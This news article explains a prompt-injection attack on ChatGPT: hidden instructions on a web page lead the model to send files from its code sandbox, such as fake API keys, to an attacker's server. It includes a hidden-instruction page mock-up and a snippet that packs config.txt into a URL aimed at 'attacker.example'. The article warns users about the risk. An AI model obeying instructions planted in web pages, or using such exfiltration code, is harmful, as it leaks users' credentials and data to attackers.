If you’re a programmer using ChatGPT to write or analyze Python code, be very careful about the URLs you paste into the generative AI tool, as hackers have found a way to use them to steal sensitive data from your projects.
The technique was first described by security researcher Johann Rehberger and later tested and confirmed by Avram Piltch at Tom’s Hardware.
ChatGPT can analyze, and then write, Python code if it’s given the right instructions. Those instructions can be uploaded to the platform in a .TXT file, or even in a .CSV if you’re after data analysis. The platform stores the uploaded files (including any sensitive information they contain, such as API keys and passwords, a common practice) in a newly generated virtual machine.
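To see how secrets end up in that virtual machine, consider the kind of file developers routinely upload alongside their scripts. The sketch below is hypothetical (the config.txt name and the KEY=VALUE format are assumptions, not details from Piltch’s test): a small helper that reads credentials from a plain-text file sitting next to the code, so uploading the script together with its config puts the secrets straight into ChatGPT’s sandbox.

```python
# Hypothetical example: a project helper that reads credentials from a
# plain-text config file next to the source code. Files like these are
# often uploaded to ChatGPT together with the scripts that use them,
# which is how secrets end up inside the sandbox VM.
from pathlib import Path


def load_credentials(path: str = "config.txt") -> dict[str, str]:
    """Parse simple KEY=VALUE lines from a plain-text config file."""
    creds = {}
    for line in Path(path).read_text().splitlines():
        if "=" in line and not line.startswith("#"):
            key, _, value = line.partition("=")
            creds[key.strip()] = value.strip()
    return creds


# config.txt might contain lines such as:
#   API_KEY=sk-test-not-a-real-key
#   DB_PASSWORD=hunter2
credentials = load_credentials()
```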
Grabbing malicious instructions
Now, ChatGPT does something similar with web pages. If a web page contains instructions, the platform will follow them when a user pastes that page’s URL into the chatbox. If those instructions tell it to grab the contents of the files stored in the VM and send them to a third-party server, it will do just that.
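What such a booby-trapped page might look like is sketched below, purely as an illustration: the visible content is ordinary, while text a human visitor never sees is addressed to the model reading the page. The markup and wording are invented here, not taken from Rehberger’s or Piltch’s proof of concept.

```python
# Hypothetical illustration only: a page whose visible content looks
# harmless while hidden text carries instructions aimed at the chatbot
# asked to read the URL. The actual payload wording is deliberately
# left as a placeholder.
BOOBY_TRAPPED_PAGE = """
<html>
  <body>
    <h1>Today's forecast: sunny, 24&deg;C</h1>
    <p>Light winds from the west, no rain expected.</p>
    <!-- Everything a human visitor sees ends here. -->
    <div style="display:none">
      [attacker's instructions to the chatbot would go here, e.g. telling
      it to collect the files in its sandbox and send them elsewhere]
    </div>
  </body>
</html>
"""

print(BOOBY_TRAPPED_PAGE)
```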
Piltch tested the idea, first uploading a TXT file containing a fake API key and password, and then creating a legitimate-looking website (a weather forecast site) which, in the background, instructed ChatGPT to take all the data, turn it into a long line of URL-encoded text, and send it to a server under his control.
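To make that “long line of URL-encoded text” concrete, here is a minimal sketch of the encoding step, assuming a config.txt like the one above; the attacker.example host and the data parameter are invented, and the snippet only builds the URL without sending anything.

```python
# Minimal sketch of the encoding step: read a file and pack its contents
# into a single URL-encoded query parameter. The host and parameter name
# are invented for illustration; no request is sent.
from pathlib import Path
from urllib.parse import quote

stolen = Path("config.txt").read_text()   # e.g. "API_KEY=...\nDB_PASSWORD=..."
exfil_url = "https://attacker.example/collect?data=" + quote(stolen)

print(exfil_url)
# -> https://attacker.example/collect?data=API_KEY%3D...%0ADB_PASSWORD%3D...
```

Because everything rides in the query string, the receiving server only needs to log incoming requests to recover the data.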
The catch is that a threat actor cannot instruct ChatGPT to grab just anyone’s data: the platform will only act for the person who pasted the URL into their own chatbox. That means a victim first needs to be convinced to paste a malicious URL into ChatGPT. Alternatively, an attacker could hijack a legitimate website and plant malicious instructions there.